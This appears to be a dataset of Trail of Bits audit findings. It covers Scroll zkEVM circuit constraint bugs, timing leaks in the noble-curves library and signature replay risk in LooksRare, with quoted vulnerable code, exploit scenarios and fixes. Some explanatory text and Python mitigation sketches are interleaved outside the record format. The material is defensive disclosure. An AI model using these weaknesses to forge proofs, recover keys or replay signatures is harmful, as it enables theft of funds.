AntePool.checkTest and triggers multiple failures within the same call stack. As a result, the AntePool makes multiple calls to the _calculateChallengerEligibility method, which increases the challenger eligibility amount with each call.
This results in a greater-than-expected loss of pool funds. Recommendations Short term, implement checks to ensure the AntePool contract's methods cannot be reentered while checkTest is executing. Long term, ensure that all calls to external contracts are reviewed for reentrancy risks. To prevent a reentrancy from causing undefined behavior in the system, ensure state variables are updated in the appropriate order; alternatively (and if sensible) disallow reentrancy altogether.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Medium" + ] + }, + { + "title": "1. PoseidonLookup is not implemented ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scroll-zkEVM-wave2-securityreview.pdf", + "body": "Poseidon hashing is performed within the MPT circuit by performing lookups into a Poseidon table via the PoseidonLookup trait, shown in figure 1.1. /// Lookup represent the poseidon table in zkevm circuit pub trait PoseidonLookup { fn lookup_columns(&self) -> (FixedColumn, [AdviceColumn; 5]) { let (fixed, adv) = self.lookup_columns_generic(); (FixedColumn(fixed), adv.map(AdviceColumn)) } fn lookup_columns_generic(&self) -> (Column, [Column; 5]) { let (fixed, adv) = self.lookup_columns(); (fixed.0, adv.map(|col| col.0)) } } Figure 1.1: src/gadgets/poseidon.rs#11-21 This trait is not implemented by any types except the testing-only PoseidonTable shown in figure 1.2, which does not constrain its columns at all. #[cfg(test)] #[derive(Clone, Copy)] pub struct PoseidonTable { q_enable: FixedColumn, left: AdviceColumn, right: AdviceColumn, hash: AdviceColumn, control: AdviceColumn, head_mark: AdviceColumn, } #[cfg(test)] impl PoseidonTable { pub fn configure(cs: &mut ConstraintSystem) -> Self { let [hash, left, right, control, head_mark] = [0; 5].map(|_| AdviceColumn(cs.advice_column())); Self { left, right, hash, control, head_mark, q_enable: FixedColumn(cs.fixed_column()), } } Figure 1.2: src/gadgets/poseidon.rs#56-80 The rest of the codebase treats this trait as a black-box implementation, so this does not seem to cause correctness problems elsewhere. However, it does limit one's ability to test some negative cases, and it makes the test coverage rely on the correctness of the PoseidonTable struct's witness generation. Recommendations Short term, create a concrete implementation of the PoseidonLookup trait to enable full testing of the MPT circuit. Long term, ensure that all parts of the MPT circuit are tested with both positive and negative tests.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: N/A" + ] + }, + { + "title": "2. IsZeroGadget does not constrain the inverse witness when the value is zero ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scroll-zkEVM-wave2-securityreview.pdf", + "body": "The IsZeroGadget implementation allows for an arbitrary inverse_or_zero witness value when the value parameter is 0. The gadget returns 1 when value is 0; otherwise, it returns 0. The implementation relies on the existence of an inverse when value is nonzero and on correctly constraining that value * (1 - value * inverse_or_zero) == 0. However, when value is 0, the constraint is immediately satisfied, regardless of the value of the inverse_or_zero witness.
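A worked check of the algebra (our notation, writing w for inverse_or_zero): the gadget enforces value * (1 - value * w) = 0; for value != 0 the only solution is w = value^(-1), but substituting value = 0 gives 0 * (1 - 0 * w) = 0, which holds for every choice of w.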
This allows an arbitrary value to be provided for that witness value. pub fn configure( cs: &mut ConstraintSystem, cb: &mut ConstraintBuilder, value: AdviceColumn, // TODO: make this a query once Query is clonable/copyable..... ) -> Self { let inverse_or_zero = AdviceColumn(cs.advice_column()); cb.assert_zero( \"value is 0 or inverse_or_zero is inverse of value\", value.current() * (Query::one() - value.current() * inverse_or_zero.current()), ); Self { value, inverse_or_zero, } } Figure 2.1: mpt-circuit/src/gadgets/is_zero.rs#48-62 Recommendations Short term, ensure that the circuit is deterministic by constraining inverse_or_zero to equal 0 when value is 0. Long term, document which circuits have nondeterministic witnesses; over time, constrain them so that all circuits have deterministic witnesses.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: N/A" + ] + }, + { + "title": "3. The MPT nonexistence proof gadget is missing constraints specified in the documentation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scroll-zkEVM-wave2-securityreview.pdf", + "body": "The gadget for checking the consistency of nonexistence proofs is missing several constraints related to type 2 nonexistence proofs. The circuit specification includes constraints for nonexistence proofs that are not present in the implementation. This causes the witness values to be unconstrained in some cases. For example, the following constraints are specified: other_key_hash should equal 0 when key does not equal other_key. other_leaf_data_hash should equal the hash of the empty node (pointed to by other_key). Neither of these constraints is enforced in the implementation: this is because the implementation has no explicit constraints imposed for the type 2 nonexistence proofs. Figure 3.1 shows that the circuit constrains these values only for type 1 proofs. pub fn configure( cb: &mut ConstraintBuilder, value: SecondPhaseAdviceColumn, key: AdviceColumn, other_key: AdviceColumn, key_equals_other_key: IsZeroGadget, hash: AdviceColumn, hash_is_zero: IsZeroGadget, other_key_hash: AdviceColumn, other_leaf_data_hash: AdviceColumn, poseidon: &impl PoseidonLookup, ) { cb.assert_zero(\"value is 0 for empty node\", value.current()); cb.assert_equal( \"key_minus_other_key = key - other key\", key_equals_other_key.value.current(), key.current() - other_key.current(), ); cb.assert_equal( \"hash_is_zero input == hash\", hash_is_zero.value.current(), hash.current(), ); let is_type_1 = !key_equals_other_key.current(); let is_type_2 = hash_is_zero.current(); cb.assert_equal( \"Empty account is either type 1 xor type 2\", Query::one(), Query::from(is_type_1.clone()) + Query::from(is_type_2), ); cb.condition(is_type_1, |cb| { cb.poseidon_lookup( \"other_key_hash == h(1, other_key)\", [Query::one(), other_key.current(), other_key_hash.current()], poseidon, ); cb.poseidon_lookup( \"hash == h(key_hash, other_leaf_data_hash)\", [ other_key_hash.current(), other_leaf_data_hash.current(), hash.current(), ], poseidon, ); }); Figure 3.1: mpt-circuit/src/gadgets/mpt_update/nonexistence_proof.rs#7-54 The Scroll team has stated that this is a specification error and that the missing constraints do not impact the soundness of the circuit. Recommendations Short term, update the specification to remove the description of these constraints; ensure that the documentation is kept updated.
Long term, add positive and negative tests for both types of nonexistence proofs.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: N/A" + ] + }, + { + "title": "4. Discrepancies between the MPT circuit specification and implementation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scroll-zkEVM-wave2-securityreview.pdf", + "body": "The MPT circuit implementation is not faithful to the circuit specification in many areas and does not contain comments for the constraints that are either missing from the implementation or that diverge from those in the specification. The allowed segment transitions depend on the proof type. For the NonceChanged proof type, the specification states that the Start segment type can transition to Start and that the AccountLeaf0 segment type also can transition to Start. However, neither of these paths is allowed in the implementation. MPTProofType::NonceChanged | MPTProofType::BalanceChanged | MPTProofType::CodeSizeExists | MPTProofType::CodeHashExists => [ ( SegmentType::Start, vec![ SegmentType::AccountTrie, // mpt has > 1 account SegmentType::AccountLeaf0, // mpt has <= 1 account ], ), ( SegmentType::AccountTrie, vec![ SegmentType::AccountTrie, SegmentType::AccountLeaf0, SegmentType::Start, // empty account proof ], ), (SegmentType::AccountLeaf0, vec![SegmentType::AccountLeaf1]), (SegmentType::AccountLeaf1, vec![SegmentType::AccountLeaf2]), (SegmentType::AccountLeaf2, vec![SegmentType::AccountLeaf3]), (SegmentType::AccountLeaf3, vec![SegmentType::Start]), Figure 4.1: mpt-circuit/src/gadgets/mpt_update/segment.rs#20 Figure 4.2: Part of the MPT specification (spec/mpt-proof.md#L318-L328) The transitions allowed for the PoseidonCodeHashExists proof type also do not match: the specification states that it has the same transitions as the NonceChanged proof type, but the implementation has different transitions. The key depth direction checks also do not match the specification. The specification states that the depth parameter should be used, but the implementation uses depth - 1. cb.condition(is_trie.clone(), |cb| { cb.add_lookup( \"direction is correct for key and depth\", [key.current(), depth.current() - 1, direction.current()], key_bit.lookup(), ); cb.assert_equal( \"depth increases by 1 in trie segments\", depth.current(), depth.previous() + 1, ); cb.condition(path_type.current_matches(&[PathType::Common]), |cb| { cb.add_lookup( \"direction is correct for other_key and depth\", [ other_key.current(), depth.current() - 1, Figure 4.3: mpt-circuit/src/gadgets/mpt_update.rs#188 Figure 4.4: Part of the MPT specification (spec/mpt-proof.md#L279-L282) Finally, the specification states that when a segment type is a non-trie type, the value of key should be constrained to 0, but this constraint is omitted from the implementation. cb.condition(!is_trie, |cb| { cb.assert_zero(\"depth is 0 in non-trie segments\", depth.current()); }); Figure 4.5: mpt-circuit/src/gadgets/mpt_update.rs#212-214 Figure 4.6: Part of the MPT specification (spec/mpt-proof.md#L284-L286) Recommendations Short term, review the specification and ensure its consistency. Match the implementation with the specification, and document possible optimizations that remove constraints, detailing why they do not cause soundness issues. Long term, include both positive and negative tests for all edge cases in the specification.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: N/A" + ] + }, + { + "title": "5.
Redundant lookups in the Word RLC circuit ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scroll-zkEVM-wave2-securityreview.pdf", + "body": "The Word RLC circuit has two redundant lookups into the BytesLookup table. The Word RLC circuit combines the random linear combination (RLC) for the lower and upper 16 bytes of a word into a single RLC value. For this, it checks that the lower and upper word segments are 16 bytes by looking into the BytesLookup table, and it checks that their RLCs are correctly computed by looking into the RlcLookup table. However, the lookup into the RlcLookup table will also ensure that the lower and upper segments of the word have the correct 16 bytes, making the first two lookups redundant. pub fn configure( cb: &mut ConstraintBuilder, [word_hash, high, low]: [AdviceColumn; 3], [rlc_word, rlc_high, rlc_low]: [SecondPhaseAdviceColumn; 3], poseidon: &impl PoseidonLookup, bytes: &impl BytesLookup, rlc: &impl RlcLookup, randomness: Query, ) { cb.add_lookup( \"old_high is 16 bytes\", [high.current(), Query::from(15)], bytes.lookup(), ); cb.add_lookup( \"old_low is 16 bytes\", [low.current(), Query::from(15)], bytes.lookup(), ); cb.poseidon_lookup( \"word_hash = poseidon(high, low)\", [high.current(), low.current(), word_hash.current()], poseidon, ); cb.add_lookup( \"rlc_high = rlc(high) and high is 16 bytes\", [high.current(), Query::from(15), rlc_high.current()], rlc.lookup(), ); cb.add_lookup( \"rlc_low = rlc(low) and low is 16 bytes\", [low.current(), Query::from(15), rlc_low.current()], rlc.lookup(), Figure 5.1: mpt-circuit/src/gadgets/mpt_update/word_rlc.rs#16-49 Although the WordRLC::configure function receives two different lookup objects, bytes and rlc, they are instantiated with the same concrete lookup: let mpt_update = MptUpdateConfig::configure( cs, &mut cb, poseidon, &key_bit, &byte_representation, &byte_representation, &rlc_randomness, &canonical_representation, ); Figure 5.2: mpt-circuit/src/mpt.rs#60-69 We also note that the labels refer to the upper and lower bytes as old_high and old_low instead of just high and low. Recommendations Short term, determine whether both the BytesLookup and RlcLookup tables are needed for this circuit, and refactor the circuit accordingly, removing the redundant constraints. Long term, review the codebase for duplicated or redundant constraints using manual and automated methods.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: N/A" + ] + }, + { + "title": "6. The NonceChanged configuration circuit does not constrain the new nonce value ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scroll-zkEVM-wave2-securityreview.pdf", + "body": "The NonceChanged configuration circuit does not constrain the config.new_value parameter to be 8 bytes.
Instead, there is a duplicated constraint for config.old_value: SegmentType::AccountLeaf3 => { cb.assert_zero(\"direction is 0\", config.direction.current()); let old_code_size = (config.old_hash.current() - config.old_value.current()) * Query::Constant(F::from(1 << 32).square().invert().unwrap()); let new_code_size = (config.new_hash.current() - config.new_value.current()) * Query::Constant(F::from(1 << 32).square().invert().unwrap()); cb.condition( config.path_type.current_matches(&[PathType::Common]), |cb| { cb.add_lookup( \"old nonce is 8 bytes\", [config.old_value.current(), Query::from(7)], bytes.lookup(), ); cb.add_lookup( \"new nonce is 8 bytes\", [config.old_value.current(), Query::from(7)], bytes.lookup(), ); Figure 6.1: mpt-circuit/src/gadgets/mpt_update.rs#1209-1228 This means that a malicious prover could update the Account node with a value of arbitrary length for the Nonce and Codesize parameters. The same constraint (with a correct label but incorrect value) is used in the ExtensionNew path type: cb.condition( config.path_type.current_matches(&[PathType::ExtensionNew]), |cb| { cb.add_lookup( \"new nonce is 8 bytes\", [config.old_value.current(), Query::from(7)], bytes.lookup(), ); Figure 6.2: mpt-circuit/src/gadgets/mpt_update.rs#1241-1248 Exploit Scenario A malicious prover uses the NonceChanged proof to update the nonce with a larger-than-expected value. Recommendations Short term, enforce the constraint for the config.new_value witness. Long term, add positive and negative testing of the edge cases present in the specification. For both the Common and ExtensionNew path types, there should be a negative test that fails because it changes the new nonce to a value larger than 8 bytes. Use automated testing tools like Semgrep to find redundant and duplicate constraints, as these could indicate that a constraint is incorrect.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "7. The Copy circuit does not totally enforce the tag values ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scroll-zkEVM-wave2-securityreview.pdf", + "body": "The Copy table includes a tag column that indicates the type of data for that particular row. However, the Copy circuit tag validation function does not totally ensure that the tag matches one of the predefined tag values. The implementation uses the copy_gadgets::constrain_tag function to bind the is_precompiled, is_tx_calldata, is_bytecode, is_memory, and is_tx_log witnesses to the actual tag value. However, the code does not ensure that exactly one of these Boolean values is true.
", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: N/A" + ] + }, + { + "title": "8. The invalid creation error handling circuit is unconstrained ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scroll-zkEVM-wave2-securityreview.pdf", + "body": "The invalid creation error handling circuit does not constrain the first byte of the actual memory to be 0xef as intended. This allows a malicious prover to redirect the EVM execution to a halt after the CREATE opcode is called, regardless of the memory value. The ErrorInvalidCreationCodeGadget circuit was updated to accommodate the memory addressing optimizations. However, in doing so, the first_byte witness value that was bound to the memory's first byte is no longer bound to it. Therefore, a malicious prover can always satisfy the circuit constraints, even if they are not in an error state after the CREATE opcode is called. fn configure(cb: &mut EVMConstraintBuilder) -> Self { let opcode = cb.query_cell(); let first_byte = cb.query_cell(); //let address = cb.query_word_rlc(); let offset = cb.query_word_rlc(); let length = cb.query_word_rlc(); let value_left = cb.query_word_rlc(); cb.stack_pop(offset.expr()); cb.stack_pop(length.expr()); cb.require_true(\"is_create is true\", cb.curr.state.is_create.expr()); let address_word = MemoryWordAddress::construct(cb, offset.clone()); // lookup memory for first word cb.memory_lookup( 0.expr(), address_word.addr_left(), value_left.expr(), value_left.expr(), None, ); // let first_byte = value_left.cells[address_word.shift()]; // constrain first byte is 0xef let is_first_byte_invalid = IsEqualGadget::construct(cb, first_byte.expr(), 0xef.expr()); cb.require_true( \"is_first_byte_invalid is true\", is_first_byte_invalid.expr(), ); Figure 8.1: evm_circuit/execution/error_invalid_creation_code.rs#36-67 Exploit Scenario A malicious prover generates two different proofs for the same transaction, one leading to the error state, and the other successfully executing the CREATE opcode. Distributing these proofs to two ends of a bridge leads to state divergence and a loss of funds. Recommendations Short term, bind the first_byte witness value to the memory value; ensure that the successful CREATE end state checks that the first byte is different from 0xef. Long term, investigate ways to generate malicious traces that could be added to the test suite; every time a new soundness issue is found, create such a malicious trace and add it to the test suite.
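For reference, the intended semantics follow EIP-3541, which forbids deployed code from beginning with the 0xef byte; a few lines of Python (our illustration of the rule the circuit should bind to the actual memory value) capture it:

# EIP-3541: CREATE must take the error path exactly when the first
# byte of the returned init-code output is 0xef.
def create_is_invalid(returned_code: bytes) -> bool:
    return len(returned_code) > 0 and returned_code[0] == 0xEF

assert create_is_invalid(b'\xef\x00\x01')   # must fail deployment
assert not create_is_invalid(b'\x60\x00')   # must deploy successfully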
", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Medium" + ] + }, + { + "title": "9. The OneHot primitive allows more than one value at once ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scroll-zkEVM-wave2-securityreview.pdf", + "body": "The OneHot primitive uses BinaryQuery values as witness values. However, despite their name, these values are not constrained to be Boolean values, allowing a malicious prover to choose more than one hot value in the data structure. impl OneHot { pub fn configure( cs: &mut ConstraintSystem, cb: &mut ConstraintBuilder, ) -> Self { let mut columns = HashMap::new(); for variant in Self::nonfirst_variants() { columns.insert(variant, cb.binary_columns::<1>(cs)[0]); } let config = Self { columns }; cb.assert( \"sum of binary columns in OneHot is 0 or 1\", config.sum(0).or(!config.sum(0)), ); config } Figure 9.1: mpt-circuit/src/gadgets/one_hot.rs#14-30 The reason the BinaryQuery values are not constrained to be Boolean is that the BinaryColumn configuration does not constrain the advice values to be Boolean, and the configuration is simply a type wrapper around the Column type. This provides no guarantees to the users of this API, who might assume that these values are guaranteed to be Boolean. pub fn configure( cs: &mut ConstraintSystem, _cb: &mut ConstraintBuilder, ) -> Self { let advice_column = cs.advice_column(); // TODO: constrain to be binary here... // cb.add_constraint() Self(advice_column) } Figure 9.2: mpt-circuit/src/constraint_builder/binary_column.rs#29-37 The OneHot primitive is used to implement the Merkle path-checking state machine, including critical properties such as requiring the key and other_key columns to remain unchanged along a given Merkle path calculation, as shown in figure 9.3. cb.condition( !segment_type.current_matches(&[SegmentType::Start, SegmentType::AccountLeaf3]), |cb| { cb.assert_equal( \"key can only change on Start or AccountLeaf3 rows\", key.current(), key.previous(), ); cb.assert_equal( \"other_key can only change on Start or AccountLeaf3 rows\", other_key.current(), other_key.previous(), ); }, ); Figure 9.3: mpt-circuit/src/gadgets/mpt_update.rs#170-184 We did not develop a proof-of-concept exploit for the path-checking table, so it may be the case that the constraint in figure 9.3 is not exploitable due to other constraints. However, if at any point it is possible to match both SegmentType::Start and some other segment type (such as by setting one OneHot cell to 1 and another to -1), a malicious prover would be able to change the key partway through and forge Merkle updates. Exploit Scenario A malicious prover uses the OneHot soundness issue to bypass the constraints ensuring that the key and other_key columns remain unchanged along a given Merkle path calculation. This allows the attacker to successfully forge MPT update proofs that update an arbitrary key. Recommendations Short term, add constraints that ensure that the advice values from these columns are Boolean. Long term, add positive and negative tests ensuring that these constraint builders operate according to their expectations.
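The missing constraints are the standard booleanity and one-hot identities; a small Python sketch (evaluated over the integers for readability, rather than over the circuit's prime field) shows what enforcing them rules out:

# Booleanity: b * (b - 1) == 0 forces each cell into {0, 1}.
# One-hot: with booleanity in place, sum(cells) == 1 then forces
# exactly one cell to be set.
def satisfies(cells: list) -> bool:
    boolean = all(b * (b - 1) == 0 for b in cells)
    one_hot = sum(cells) == 1
    return boolean and one_hot

print(satisfies([0, 1, 0]))   # True: a genuine one-hot assignment
print(satisfies([1, 1, -1]))  # False: sums to 1 but fails booleanity,
                              # ruling out the 1-and-minus-1 trick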
", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "10. Intermediate columns are not explicit ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scroll-zkEVM-wave2-securityreview.pdf", + "body": "The MPT update circuit includes two arrays of intermediate value columns, as shown in figure 10.1. intermediate_values: [AdviceColumn; 10], // can be 4? second_phase_intermediate_values: [SecondPhaseAdviceColumn; 10], // 4? Figure 10.1: mpt-circuit/src/gadgets/mpt_update.rs#65-66 These columns are used as general-use cells for values that are only conditionally needed in a given row, reducing the total number of columns needed. For example, figure 10.2 shows that intermediate_values[0] is used for the address value in rows that match SegmentType::Start, but as shown in figure 10.3, rows representing the SegmentType::AccountLeaf3 state of a Keccak code-hash proof use that same slot for the old_high value. let address = self.intermediate_values[0].current() * is_start(); Figure 10.2: mpt-circuit/src/gadgets/mpt_update.rs#78 SegmentType::AccountLeaf3 => { cb.assert_equal(\"direction is 1\", config.direction.current(), Query::one()); let [old_high, old_low, new_high, new_low, ..] = config.intermediate_values; Figure 10.3: mpt-circuit/src/gadgets/mpt_update.rs#1632-1635 In some cases, cells of intermediate_values are used starting from the end of the intermediate_values column, such as the other_key_hash and other_leaf_data_hash values in PathType::ExtensionOld rows, as illustrated in figure 10.4.
let [.., key_equals_other_key, new_hash_is_zero] = config.is_zero_gadgets; let [.., other_key_hash, other_leaf_data_hash] = config.intermediate_values; nonexistence_proof::configure( cb, config.new_value, config.key, config.other_key, key_equals_other_key, config.new_hash, new_hash_is_zero, other_key_hash, other_leaf_data_hash, poseidon, ); Figure 10.4: mpt-circuit/src/gadgets/mpt_update.rs#1036-1049 Although we did not find any mistakes such as misused columns, this pattern is ad hoc and error-prone, and evaluating the correctness of this pattern requires checking every individual use of intermediate_values. Recommendations Short term, document the assignment of all intermediate_values columns in each relevant case. Long term, consider using Rust types to express the different uses of the various intermediate_values columns. For example, one could define an IntermediateValues enum, with cases like StartRow { address: &AdviceColumn } and ExtensionOld { other_key_hash: &AdviceColumn, other_leaf_data_hash: &AdviceColumn }, and a single function fn parse_intermediate_values(segment_type: SegmentType, path_type: PathType, columns: &[AdviceColumn; 10]) -> IntermediateValues. Then, the correct assignment and use of intermediate_values columns can be audited only by checking parse_intermediate_values.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: N/A" + ] + }, + { + "title": "1. Timing issues ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-ryanshea-noblecurveslibrary-securityreview.pdf", + "body": "The library provides a scalar multiplication routine that aims to keep the number of BigInteger operations constant, in order to be (close to) constant-time. However, there are some locations in the implementation where timing differences can cause issues: pre-computed point look-up during scalar multiplication (figure 1.1), the second part of signature generation, and the Tonelli-Shanks square root computation. // Check if we're onto Zero point. // Add random point inside current window to f. const offset1 = offset; const offset2 = offset + Math.abs(wbits) - 1; // -1 because we skip zero const cond1 = window % 2 !== 0; const cond2 = wbits < 0; if (wbits === 0) { // The most important part for const-time getPublicKey f = f.add(constTimeNegate(cond1, precomputes[offset1])); } else { p = p.add(constTimeNegate(cond2, precomputes[offset2])); } Figure 1.1: Pre-computed point lookup during scalar multiplication ( noble-curves/src/abstract/curve.ts:117-128 ) The scalar multiplication routine comprises a loop, part of which is shown in Figure 1.1. Each iteration adds a selected pre-computed point to the accumulator p (or to the dummy accumulator f if the relevant scalar bits are all zero). However, the array access to select the appropriate pre-computed point is not constant-time. Figure 1.2 shows how the implementation computes the second half of an ECDSA signature. const s = modN(ik * modN(m + modN(d * r))); // s = k^-1(m + rd) mod n Figure 1.2: Generation of the second part of the signature ( noble-curves/src/abstract/weierstrass.ts:988 ) First, the private key is multiplied by the first half of the signature and reduced modulo the group order. Next, the message digest is added and the result is again reduced modulo the group order.
If the modulo operation is not constant-time, and if an attacker can detect this timing difference, they can perform a lattice attack to recover the signing key. The details of this attack are described in the TCHES 2019 article by Ryan. Note that the article does not show that this timing difference attack can be practically exploited, but instead mounts a cache-timing attack to exploit it. FpSqrt is a function that computes square roots of quadratic residues over F_p. Based on the value of p, this function chooses one of several sub-algorithms, including Tonelli-Shanks. Some of these algorithms are constant-time with respect to p, but some are not. In particular, the implementation of the Tonelli-Shanks algorithm has a high degree of timing variability. The FpSqrt function is used to decode compressed point representations, so it can influence timing when handling potentially sensitive or adversarial data. Most texts consider Tonelli-Shanks the fallback algorithm when a faster or simpler algorithm is unavailable. However, Tonelli-Shanks can be used for any prime modulus p. Further, Tonelli-Shanks can be made constant time for a given value of p. Timing leakage threats can be reduced by modifying the Tonelli-Shanks code to run in constant time (see here), and making the constant-time implementation the default square root algorithm. Special-case algorithms can be broken out into separate functions (whether constant- or variable-time), for use when the modulus is known to work, or timing attacks are not a concern. Exploit Scenario An attacker interacts with a user of the library and measures the time it takes to execute signature generation or ECDH key exchange. In the case of static ECDH, the attacker may provide different public keys to be multiplied with the static private key of the library user. In the case of ECDSA, the attacker may get the user to repeatedly sign the same message, which results in scalar multiplications on the base point using the same deterministically generated nonce. The attacker can subsequently average the obtained execution times for operations with the same input to gain more precise timing estimates. Then, the attacker uses the obtained execution times to mount a timing attack: In the case of ECDSA, the attacker may attempt to mount the attack from the TCHES 2019 article by Ryan. However, it is unknown whether this attack will work in practice when based purely on timing. In the case of static ECDH, the attacker may attempt to mount a recursive attack, similar to the attacks described in the Cardis 1998 article by Dhem et al. or the JoCE 2013 article by Danger et al. Note that the timing differences caused by the precomputed point look-up may not be sufficient to mount such a timing attack. The attacker would need to find other timing differences, such as differences in the point addition routines based on one of the input points. The fact that the library uses a complete addition formula increases the difficulty, but there could still be timing differences caused by the underlying big integer arithmetic. Determining whether such timing attacks are practically applicable to the library (and how many executions they would need) requires a large number of measurements on a dedicated benchmarking system, which was not done as part of this engagement. Recommendations Short term, consider adding scalar randomization to primitives where the same private scalar can be used multiple times, such as ECDH and deterministic ECDSA. To mitigate the attack from the TCHES 2019 article by Ryan, consider either blinding the private scalar in the signature computation or removing the inner modular reductions, i.e., computing s = modN(ik * (m + d * r)). Long term, ensure that all low-level operations are constant-time. References Return of the Hidden Number Problem, Ryan, TCHES 2019 A Practical Implementation of the Timing Attack, Dhem et al., Cardis 1998 A synthesis of side-channel attacks on elliptic curve cryptography in smart-cards, Danger et al., JoCE 2013
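One common mitigation for the lookup leak is a full-scan, constant-time select that touches every table entry; the Python sketch below shows the shape of the countermeasure (our illustration only; in the library the same idea would be expressed with branch-free BigInteger arithmetic over the precomputes array):

# Constant-time table selection: read every entry and combine with a
# branch-free mask instead of indexing table[index] directly.
def ct_select(table: list, index: int) -> int:
    result = 0
    for i, entry in enumerate(table):
        mask = -int(i == index)   # -1 (all ones) when selected, else 0
        result |= entry & mask    # only the selected entry survives
    return result

table = [10, 20, 30, 40]
assert ct_select(table, 2) == 30  # every call performs four reads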
", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + }, + { + "title": "1. Risk of reuse of signatures across forks due to lack of chainID validation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "At construction, the LooksRareExchange contract computes the domain separator using the network's chainID, which is fixed at the time of deployment. In the event of a post-deployment chain fork, the chainID cannot be updated, and the signatures may be replayed across both versions of the chain. constructor ( address _currencyManager , address _executionManager , address _royaltyFeeManager , address _WETH , address _protocolFeeRecipient ) { // Calculate the domain separator DOMAIN_SEPARATOR = keccak256 ( abi.encode( 0x8b73c3c69bb8fe3d512ecc4cf759cc79239f7b179b0ffacaa9a75d522b39400f , // keccak256(\"EIP712Domain(string name,string version,uint256 chainId,address verifyingContract)\") 0xda9101ba92939daf4bb2e18cd5f942363b9297fbc3232c9dd964abb1fb70ed71 , // keccak256(\"LooksRareExchange\") 0xc89efdaa54c0f20c7adf612882df0950f5a951637e0307cdcb4c672f298b8bc6 , // keccak256(bytes(\"1\")) for versionId = 1 block.chainid , address ( this ) ) ); currencyManager = ICurrencyManager(_currencyManager); executionManager = IExecutionManager(_executionManager); royaltyFeeManager = IRoyaltyFeeManager(_royaltyFeeManager); WETH = _WETH; protocolFeeRecipient = _protocolFeeRecipient; Figure 1.1: contracts/contracts/LooksRareExchange.sol#L137-L145 The _validateOrder function in the LooksRareExchange contract uses a SignatureChecker function, verify, to check the validity of a signature: // Verify the validity of the signature require ( SignatureChecker.verify( orderHash, makerOrder.signer, makerOrder.v, makerOrder.r, makerOrder.s, DOMAIN_SEPARATOR ), \"Signature: Invalid\" ); Figure 1.2: contracts/contracts/LooksRareExchange.sol#L576-L587 However, the verify function checks only that a user has signed the domainSeparator. As a result, in the event of a hard fork, an attacker could reuse signatures to receive user funds on both chains. To mitigate this risk, if a change in the chainID is detected, the domain separator can be cached and regenerated. Alternatively, instead of regenerating the entire domain separator, the chainID can be included in the schema of the signature passed to the order hash. /** * @notice Returns whether the signer matches the signed message * @param hash the hash containing the signed message * @param signer the signer address to confirm message validity * @param v parameter (27 or 28) * @param r parameter * @param s parameter * @param domainSeparator parameter to prevent signature being executed in other chains and environments * @return true --> if valid // false --> if invalid */ function verify ( bytes32 hash , address signer , uint8 v , bytes32 r , bytes32 s , bytes32 domainSeparator ) internal view returns ( bool ) { // \x19\x01 is the standardized encoding prefix // https://eips.ethereum.org/EIPS/eip-712#specification bytes32 digest = keccak256 (abi.encodePacked( \"\\x19\\x01\" , domainSeparator, hash )); if (Address.isContract(signer)) { // 0x1626ba7e is the interfaceId for signature contracts (see IERC1271) return IERC1271(signer).isValidSignature(digest, abi.encodePacked(r, s, v)) == 0x1626ba7e ; } else { return recover(digest, v, r, s) == signer; } } Figure 1.3: contracts/contracts/libraries/SignatureChecker.sol#L41-L68 The signature schema does not account for the contract's chain. If a fork of Ethereum is made after the contract's creation, every signature will be usable in both forks. Exploit Scenario Bob signs a maker order on the Ethereum mainnet. He signs the domain separator with a signature to sell an NFT. Later, Ethereum is hard-forked and retains the same chain ID. As a result, there are two parallel chains with the same chain ID, and Eve can use Bob's signature to match orders on the forked chain. Recommendations Short term, to prevent post-deployment forks from affecting signatures, add the chain ID opcode to the signature schema. Long term, identify and document the risks associated with having forks of multiple chains and develop related mitigation strategies.
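The cache-and-regenerate mitigation can be sketched in a few lines of Python (logic only: sha256 stands in for keccak256, the exchange address is a hypothetical placeholder, and the encoding abbreviates the ABI-encoded EIP-712 domain struct quoted above):

import hashlib

def domain_separator(chain_id: int, verifying_contract: str) -> bytes:
    # sha256 as a stand-in for keccak256 over the
    # EIP712Domain(name, version, chainId, verifyingContract) fields.
    data = 'LooksRareExchange|1|%d|%s' % (chain_id, verifying_contract)
    return hashlib.sha256(data.encode()).digest()

CACHED_CHAIN_ID = 1
CACHED_SEPARATOR = domain_separator(CACHED_CHAIN_ID, '0xExchangePlaceholder')

def current_separator(current_chain_id: int) -> bytes:
    # Recompute when a fork changes the chain id, so signatures bound
    # to the old id stop verifying on the forked chain.
    if current_chain_id == CACHED_CHAIN_ID:
        return CACHED_SEPARATOR
    return domain_separator(current_chain_id, '0xExchangePlaceholder')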
